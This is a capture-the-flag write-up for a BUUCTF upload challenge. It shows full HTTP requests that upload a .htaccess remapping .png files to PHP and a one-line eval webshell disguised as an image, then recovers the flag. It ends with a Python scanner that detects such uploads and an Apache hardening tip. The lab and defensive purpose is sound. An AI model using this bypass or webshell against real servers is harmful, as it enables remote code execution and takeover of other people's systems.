BUUCTF WEB [MRCTF2020]你传你🐎呢
The solution is somewhat similar to [SUCTF 2019]CheckIn.
-
Every PHP file extension tried was filtered on upload, so instead try uploading a
.htaccess
file that makes png files execute as PHP: AddType application/x-httpd-php .png
-
Upload it, intercept the request, and change
Content-Type
to image/png
POST /upload.php HTTP/1.1
Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Length: 327
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr2HGylAymjQ8BbFW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c5f395566d2814f5ebe70543657184fb
Connection: close

------WebKitFormBoundaryr2HGylAymjQ8BbFW
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png

AddType application/x-httpd-php .png
------WebKitFormBoundaryr2HGylAymjQ8BbFW
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundaryr2HGylAymjQ8BbFW--
Response:
/var/www/html/upload/1efe2d7802e831c1a06a2b797f5ec9fc/.htaccess succesfully uploaded!
-
The .htaccess upload has now succeeded, so next upload an image webshell (PHP code in a file named .png):
POST /upload.php HTTP/1.1
Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Length: 338
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0edqgv9TGgRsVltb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c5f395566d2814f5ebe70543657184fb
Connection: close

------WebKitFormBoundary0edqgv9TGgRsVltb
Content-Disposition: form-data; name="uploaded"; filename="1.png"
Content-Type: image/png

<script language=php>@eval($_POST['cmd']);</script>
------WebKitFormBoundary0edqgv9TGgRsVltb
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundary0edqgv9TGgRsVltb--
Response:
/var/www/html/upload/1efe2d7802e831c1a06a2b797f5ec9fc/1.png succesfully uploaded!
-
Connect to
1.png
with AntSword; the flag is in the filesystem root directory: flag{1d77cba7-86c4-429b-97e9-7c18e17eb4d0}
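From the defender's side, both uploads leave recognizable artifacts in the upload directory: a .htaccess that remaps a handler, and a .png with no PNG signature that contains PHP code. The Python scanner below is an added example, not part of the original write-up; its function names and pattern list are assumptions, and the sample files are constructed from the two request bodies shown above.

```python
import os
import re
import tempfile

# Added example: names and patterns are assumptions; sample files are constructed.
# Directives that let a per-directory .htaccess change how files are handled.
HANDLER_RE = re.compile(rb"^\s*(AddType|AddHandler|SetHandler|ForceType)\b.*php", re.I | re.M)
# PHP entry points, including the legacy <script language=php> form used on this page.
PHP_RE = re.compile(rb"<\?(php|=)|<script\s+language\s*=\s*[\"']?php", re.I)
IMAGE_MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}

def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings for an upload directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # only the first 1 MiB is inspected
            ext = os.path.splitext(name)[1].lower()
            if name.lower() == ".htaccess":
                reason = "htaccess-php-handler" if HANDLER_RE.search(data) else "htaccess-in-upload-dir"
                findings.append((rel, reason))
            elif ext in IMAGE_MAGIC:
                if not data.startswith(IMAGE_MAGIC[ext]):
                    findings.append((rel, "bad-image-magic"))
                if PHP_RE.search(data):
                    findings.append((rel, "php-code-in-image"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: the two uploads from the write-up plus a clean PNG header."""
    user = os.path.join(root, "1efe2d7802e831c1a06a2b797f5ec9fc")
    os.makedirs(user)
    samples = {
        ".htaccess": b"AddType application/x-httpd-php .png\n",
        "1.png": b"<script language=php>@eval($_POST['cmd']);</script>",
        "ok.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    }
    for name, body in samples.items():
        with open(os.path.join(user, name), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan_upload_dir(tmp):
            print(f"{reason:24} {rel}")
```

Setting `AllowOverride None` for the upload directory in the main Apache configuration makes an uploaded .htaccess inert, which removes the first step of this chain regardless of what the upload filter lets through.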